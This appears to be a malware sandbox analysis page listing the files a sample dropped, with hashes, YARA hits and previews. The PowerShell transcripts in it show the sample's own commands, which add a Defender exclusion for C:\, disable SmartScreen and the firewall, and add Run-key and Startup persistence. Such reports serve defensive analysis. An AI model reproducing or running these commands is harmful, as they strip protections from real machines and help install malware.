                                                                                                                                                            Preview:PSMODULECACHE.....y......I...C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........AfterEach........Should........BeforeEach........Get-MockDynamicParameters........It........Assert-VerifiableMocks........BeforeAll........Context........Set-TestInconclusive........AfterAll........Setup........Set-DynamicParameterVariables........Invoke-Pester........Assert-MockCalled........New-PesterOption........l.D.....I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ConfigCI\ConfigCI.psd1........Get-CIPolicyInfo........Get-CIPolicyIdInfo........Set-CIPolicySetting........Merge-CIPolicy........Edit-CIPolicyRule........Set-CIPolicyVersion........Set-CIPolicyIdInfo........ConvertFrom-CIPolicy........Set-HVCIOptions........Add-SignerRule........New-CIPolicy........Get-SystemDriver........Set-RuleOption........Get-CIPolicy......

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1288
                                                                                                                                                            Entropy (8bit):5.356149890382935
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:3FPpQrLAo4KAxCoOu42qs5qRPnZe9t4CvKaRSF8PJKnKmh0/:1PerB4BOu/q8qRBe9t4CvpR48B4y
                                                                                                                                                            MD5:2AF59A43D969E646816E09736F1D2AB4
                                                                                                                                                            SHA1:64BCE68EA11CB35CCB7832B2374BC7ADCC335F88
                                                                                                                                                            SHA-256:75D5A94618C89F4D09BAEFF3BD38B567118C6CD09D9ED94C0342E5F14CEB3C4F
                                                                                                                                                            SHA-512:FE505467C2F471901E6BD01DAF5BB44919B0DD9467439845F9BCD596B6982327D1210B64E849A041AF926B2D870B6CE562F1DB7588081D8729BACE6DCA4D5752
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.Automation4...............T..'Z..N..Nvj.G.........System.Data.4................Zg5..:O..g..q..........System.Xml..<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServicesL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementT...............}0.2...K.............*.Microsoft.Management.Inf

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0snzsefa.cex.ps1

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:1

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2nybsp2t.qyq.psm1

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:1

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fnlq0wbb.ax0.ps1

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:1

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t3urlzwb.2fk.psm1

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:1

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\aut79D9.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\ProgramData\UpSys.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):25822
                                                                                                                                                            Entropy (8bit):7.676686877584948
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:X4ltkgfpZ92EBn80hR2u5k+G2qqTswsOWDK4dQS97hJw:X4bx9780/k+1TLs3FGOi
                                                                                                                                                            MD5:436C1BB98DEECCECB73FAD945F1DD3DC
                                                                                                                                                            SHA1:774313BA911945589971BBC73498D81F060DABE6
                                                                                                                                                            SHA-256:05EAE1691149CC66E458D5E5B4430BD3B938B278B8BDB2C887A13C9871004C51
                                                                                                                                                            SHA-512:66EA41B9B4A42F7C40D1CE5B6E82A6F03E8489648B912D96A81EFA13D340D4D651078DF7C1302C595CA83408E7208D1D79F02165DC27383952A9ABE7F851C3E2
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:..%...F:.Q&.Y..o4.M&.Y..mC.Lf.)..k6..f.9..T.M.Y..kF....(.I5.M..I..i7.....1....Y..k7.."@...o2.L.......L&....i6.L.....m9..(..@....N......8..2.Y..o4.*fs...g5.4......h.MfSp.`.[.* ..1..&.....2.M.Sy...2.P.......M...X.M&`...Q5... ....7...T@..e3.L.39....L.s..mM@M..fiE.Lf.I...K....mF.Q.A...a5.M....E.4.r...n......@.6@K../.k8..s@./......"....E...f.i..k8..&.0..a2.L.....s2...T`..j.y...m7.L&.9.......Y.(..4...z......... ....L.......T.A.i..o4.f.... .H....`'....DH.......@.....H...2..&.`!Bo3...p.\..@#.,Fr.T..l...R.y....{......Z...@............G.(...hL.S ...6.:..B..........1..@.>@1..0.N.@L.#.....@.....7....>I..iB..(.....@..$..#.....F.M.\...i6.......I..x.9.....M@.0...9@....@....".(..`.....fi4.t..0...& ...j.4L.....L. .Y..g3Y...f .H...1.4....@....jf..P@..5..h.#@%.4.....h........&.....c5...}.z... ...d.(.M..>0.O.kB.Q.T...e2...tY......H*.....V..0.c.T....@......... :..P.....;..P...Vd...x[.L.........CjkC...|SP*..!.bA...L..|...#.2.0@#..'...<..b....D .........h.}..K......mB..r8.-...| m.....i.&@w...@_

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\autBE16.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\ProgramData\UpSys.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):25822
                                                                                                                                                            Entropy (8bit):7.676686877584948
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:X4ltkgfpZ92EBn80hR2u5k+G2qqTswsOWDK4dQS97hJw:X4bx9780/k+1TLs3FGOi
                                                                                                                                                            MD5:436C1BB98DEECCECB73FAD945F1DD3DC
                                                                                                                                                            SHA1:774313BA911945589971BBC73498D81F060DABE6
                                                                                                                                                            SHA-256:05EAE1691149CC66E458D5E5B4430BD3B938B278B8BDB2C887A13C9871004C51
                                                                                                                                                            SHA-512:66EA41B9B4A42F7C40D1CE5B6E82A6F03E8489648B912D96A81EFA13D340D4D651078DF7C1302C595CA83408E7208D1D79F02165DC27383952A9ABE7F851C3E2
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:..%...F:.Q&.Y..o4.M&.Y..mC.Lf.)..k6..f.9..T.M.Y..kF....(.I5.M..I..i7.....1....Y..k7.."@...o2.L.......L&....i6.L.....m9..(..@....N......8..2.Y..o4.*fs...g5.4......h.MfSp.`.[.* ..1..&.....2.M.Sy...2.P.......M...X.M&`...Q5... ....7...T@..e3.L.39....L.s..mM@M..fiE.Lf.I...K....mF.Q.A...a5.M....E.4.r...n......@.6@K../.k8..s@./......"....E...f.i..k8..&.0..a2.L.....s2...T`..j.y...m7.L&.9.......Y.(..4...z......... ....L.......T.A.i..o4.f.... .H....`'....DH.......@.....H...2..&.`!Bo3...p.\..@#.,Fr.T..l...R.y....{......Z...@............G.(...hL.S ...6.:..B..........1..@.>@1..0.N.@L.#.....@.....7....>I..iB..(.....@..$..#.....F.M.\...i6.......I..x.9.....M@.0...9@....@....".(..`.....fi4.t..0...& ...j.4L.....L. .Y..g3Y...f .H...1.4....@....jf..P@..5..h.#@%.4.....h........&.....c5...}.z... ...d.(.M..>0.O.kB.Q.T...e2...tY......H*.....V..0.c.T....@......... :..P.....;..P...Vd...x[.L.........CjkC...|SP*..!.bA...L..|...#.2.0@#..'...<..b....D .........h.}..K......mB..r8.-...| m.....i.&@w...@_

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\bjnqnwl

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\ProgramData\UpSys.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):83514
                                                                                                                                                            Entropy (8bit):3.495672104133364
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:QxUzapK6b5Hg7OoSZ9f7fOxrIGyiBquTsR3cgwO0wNP02:wo8GQ
                                                                                                                                                            MD5:940B1915CADEE0E2B33D80799816F6C7
                                                                                                                                                            SHA1:2C10E4FEC3E8C054055D1ED78757117575F273F2
                                                                                                                                                            SHA-256:81E89E7266CFE5158E44F5578C8BE61353E781DAEBDD47A33597E9EC503D379C
                                                                                                                                                            SHA-512:CC3C574FD5392C1B54146B591E22B1C01C95E34A602C403AD96C49B7EE6AD31D1478A00CC1334286ADDC5CB94496372A172745E9AD20554023E1E22C7DA1E1C5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Yara Hits:
                                                                                                                                                            • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: C:\Users\user\AppData\Local\Temp\bjnqnwl, Author: Florian Roth
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:4D7573744465636C61726556617273!7ET4755495F52554E4445464D5347!7ET47554944617461536570617261746F7243686172!7ET20404C4620!7ET57696E44657465637448696464656E54657874!7ET312E35!7ET506F77657252756E!7ET202D20417574686F7220627920426C75654C696665!7ET5B434C4153533A506F77657252756E3A76!7ET5D!7ET323031362D32303231!7ET2040557365724E616D6520!7ET2040436F6D70696C656420!7ET20404175746F497445786520!7ET20404F534172636820!7ET20404175746F497458363420!7ET20404F5356657273696F6E20!7ET20404F5356657273696F6E20!7ET5F2858507C32303028307C332929!7ET4F7065726174696E672053797374656D204E6F7420537570706F7274656421!7ET546F20737461727420736F66747761726520796F75206D75737420686176652041646D696E6973747261746F722072696768747321!7ET204053637269707444697220!7ET204057696E646F777344697220!7ET53797374656D33325C!7ET2040576F726B696E6744697220!7ET6B65726E656C33322E646C6C!7ET7573657233322E646C6C!7ET61647661706933322E646C6C!7ET7368656C6C33322E646C6C!7ET6F6C6533322E646C6C!7ET73686C776170692E646C6C!7ET67646933322E646C6C!7ET484B4C4D!7ET48

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\ygufeko

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\ProgramData\UpSys.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):83514
                                                                                                                                                            Entropy (8bit):3.495672104133364
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:QxUzapK6b5Hg7OoSZ9f7fOxrIGyiBquTsR3cgwO0wNP02:wo8GQ
                                                                                                                                                            MD5:940B1915CADEE0E2B33D80799816F6C7
                                                                                                                                                            SHA1:2C10E4FEC3E8C054055D1ED78757117575F273F2
                                                                                                                                                            SHA-256:81E89E7266CFE5158E44F5578C8BE61353E781DAEBDD47A33597E9EC503D379C
                                                                                                                                                            SHA-512:CC3C574FD5392C1B54146B591E22B1C01C95E34A602C403AD96C49B7EE6AD31D1478A00CC1334286ADDC5CB94496372A172745E9AD20554023E1E22C7DA1E1C5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Yara Hits:
                                                                                                                                                            • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: C:\Users\user\AppData\Local\Temp\ygufeko, Author: Florian Roth
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:4D7573744465636C61726556617273!7ET4755495F52554E4445464D5347!7ET47554944617461536570617261746F7243686172!7ET20404C4620!7ET57696E44657465637448696464656E54657874!7ET312E35!7ET506F77657252756E!7ET202D20417574686F7220627920426C75654C696665!7ET5B434C4153533A506F77657252756E3A76!7ET5D!7ET323031362D32303231!7ET2040557365724E616D6520!7ET2040436F6D70696C656420!7ET20404175746F497445786520!7ET20404F534172636820!7ET20404175746F497458363420!7ET20404F5356657273696F6E20!7ET20404F5356657273696F6E20!7ET5F2858507C32303028307C332929!7ET4F7065726174696E672053797374656D204E6F7420537570706F7274656421!7ET546F20737461727420736F66747761726520796F75206D75737420686176652041646D696E6973747261746F722072696768747321!7ET204053637269707444697220!7ET204057696E646F777344697220!7ET53797374656D33325C!7ET2040576F726B696E6744697220!7ET6B65726E656C33322E646C6C!7ET7573657233322E646C6C!7ET61647661706933322E646C6C!7ET7368656C6C33322E646C6C!7ET6F6C6533322E646C6C!7ET73686C776170692E646C6C!7ET67646933322E646C6C!7ET484B4C4D!7ET48

                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\DllHost.exe
                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Archive, ctime=Thu Jul 7 06:51:10 2022, mtime=Thu Jul 7 06:51:10 2022, atime=Thu Jul 7 06:51:03 2022, length=451072, window=hideshowminimized
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):849
                                                                                                                                                            Entropy (8bit):4.639003700970406
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:8i8zVn0chC4eCu22KhPSQVKQhkKMjAseiaWT1ioq/Gi9bXSQRfKUWMpntBm:8zzVnh6fKhPSvQVIAsQWMe0XSLPMLBm
                                                                                                                                                            MD5:68D3F87DBE15FDC0DFAF35BD30F7075B
                                                                                                                                                            SHA1:E0769F32B0ACA1F9B654FA39CE8C674BCE7C2548
                                                                                                                                                            SHA-256:073C727D7781BAC19AF9D40C39FACFFA373CDDE81015A590C51D463BB75447FA
                                                                                                                                                            SHA-512:5DACFE556FA4FECBDBFF0C0589595C076FBE6E3D27E6A47EFCA852908AF1D6AAFB00DD2D52EDE49F427BB54D3FCBD4F5FEC5350548D788602ED13F08DF43821B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:L..................F.... ...8X.R...]B.R...g..N...........................Y....P.O. .:i.....+00.../C:\...................`.1......PPP..PROGRA~3..H......L..TY>....F........................P.r.o.g.r.a.m.D.a.t.a.....j.1......Tf>..MICROS~4..R.......Tf>.Tf>....<.........................M.i.c.r.o.s.o.f.t.N.e.t.w.o.r.k.....`.2......Tb> .System.exe..F.......Tf>.Tf>..............................S.y.s.t.e.m...e.x.e.......Y...............-.......X............w.I.....C:\ProgramData\MicrosoftNetwork\System.exe....l.i.n.k. .d.e.s.c.r.i.p.t.i.o.n.B.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.N.e.t.w.o.r.k.\.S.y.s.t.e.m...e.x.e.`.......X.......618321...........!a..%.H.VZAj...n&$.............!a..%.H.VZAj...n&$............E.......9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............

                                                                                                                                                            C:\Users\user\Documents\20220707\PowerShell_transcript.618321.Ts5vYtwg.20220707095141.txt

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):17859
                                                                                                                                                            Entropy (8bit):5.54574799604787
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:tBeKAeKBBeK1BeKyfBeKqSBeK14ZDBeKmIMMn:tBIJB9BkBSSBKdBTMMn
                                                                                                                                                            MD5:4F47D83CE4C9F10F23D62AFB5E086C68
                                                                                                                                                            SHA1:76DE4BD4FCCC8072940578526EA33B53DA58EA14
                                                                                                                                                            SHA-256:AA9628D9D6AE33785EE0C22CFA90D84851FE2FA669479E5F199CB6553E4317EC
                                                                                                                                                            SHA-512:C2947E4B2FD0110EB3E91DDFD9B896E3078433F7161D7375F1785E0C31E88C50E235ED4021D22C08A6D987309D4D90AC482A253481A10FD22B8786A8C0DEA57F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:.**********************..Windows PowerShell transcript start..Start time: 20220707095143..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 618321 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ...Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ...Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ...Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ...Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData

                                                                                                                                                            C:\Users\user\Documents\20220707\PowerShell_transcript.618321.YQIW9dfZ.20220707095112.txt

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):15180
                                                                                                                                                            Entropy (8bit):5.545542818297535
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:BZWjCMNddObfbWTkW8eKaqDo1ZsdObfbWTkW8eKDZTjCMNddObfbWTkW8eKaqDo7:xBeKgeKQBeKojBeKLBeK/RBeK9QEIIF
                                                                                                                                                            MD5:C1DBBBFFB268F2173CC8C8401E2FEEDA
                                                                                                                                                            SHA1:8350E11448A75A3852E9C17508D4DDDBEEA2F68C
                                                                                                                                                            SHA-256:C89F6678A14D8AC4CDDB88DA8E0C7F33EC0F5D475D18283B6A896C7C4C3D2838
                                                                                                                                                            SHA-512:E351BE01E6CC48E32216C1AB3867CF95CCC2D52C33AC20BB0B02DE9789555FA8CB20D346DFD4F2680811FCDC62037CF6DA40D23A51779C7AEDB7C15446CF1BE9
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:.**********************..Windows PowerShell transcript start..Start time: 20220707095114..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 618321 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ...Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ...Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ...Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ...Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData

                                                                                                                                                            C:\Windows\Logs\CBS\CBS.log

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                                            Category:modified
                                                                                                                                                            Size (bytes):3014656
                                                                                                                                                            Entropy (8bit):5.315388303498102
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:TLS5YygL1mnGVFQa/qJIxOfTFyKQel5lmhSVjfChq4TMmdqLO:TL1dqLO
                                                                                                                                                            MD5:5CC7081F613C35E0CFD72797A85BBFD5
                                                                                                                                                            SHA1:BE5E2D5EC9657D05CADB3C145FF2A296119E3C66
                                                                                                                                                            SHA-256:5389BF28B5057A51D3E9F4AF45316C13BF912673CD3E5592952FA4B02F19A75E
                                                                                                                                                            SHA-512:CC43D252DC9962826C0D3A2FDF991E834AD04B7013C102A652C03C141E1BABADDDA9A219263D48936316EAE5924E5A7610D0B7C679311EF9B61AA335E7829206
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:.2019-06-27 00:55:29, Info CBS TI: --- Initializing Trusted Installer ---..2019-06-27 00:55:29, Info CBS TI: Last boot time: 2019-06-27 00:49:51.660..2019-06-27 00:55:29, Info CBS Starting TrustedInstaller initialization...2019-06-27 00:55:29, Info CBS Lock: New lock added: CCbsPublicSessionClassFactory, level: 30, total lock:4..2019-06-27 00:55:29, Info CBS Lock: New lock added: CCbsPublicSessionClassFactory, level: 30, total lock:5..2019-06-27 00:55:29, Info CBS Lock: New lock added: WinlogonNotifyLock, level: 8, total lock:6..2019-06-27 00:55:29, Info CBS Ending TrustedInstaller initialization...2019-06-27 00:55:29, Info CBS Starting the TrustedInstaller main loop...2019-06-27 00:55:29, Info CBS TrustedInstaller service starts successfully...2019-06-27 00:55:29, Info CBS No startup pr

                                                                                                                                                            C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):55
                                                                                                                                                            Entropy (8bit):4.306461250274409
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                            C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                            File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                            Category:modified
                                                                                                                                                            Size (bytes):10844
                                                                                                                                                            Entropy (8bit):3.16191070607899
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:cY+38+DJM+i2Jt+iDQ+yw+f0+rU+0Jtk+EOtF+E7tC+Ew8+n:j+s+i+Z+z+B+c+Y+0g+J+j+I+n
                                                                                                                                                            MD5:ECAAF69C329D08FA35747D7BC3AE6555
                                                                                                                                                            SHA1:636E60665174366875707918D4EE3508B1119BB6
                                                                                                                                                            SHA-256:A585F072BD7DABE7ABFCD328775DCE363900E2ACA8A2AA295821135B80F052BA
                                                                                                                                                            SHA-512:2E7FF0F45A617193F87C91779AEF16B3885EA65D87AC2DEEF2DF884D10246085DCF58B98008FA95DC33BA9737198446D6AF2BB48C7BC527DBA66FDE7121E873C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.

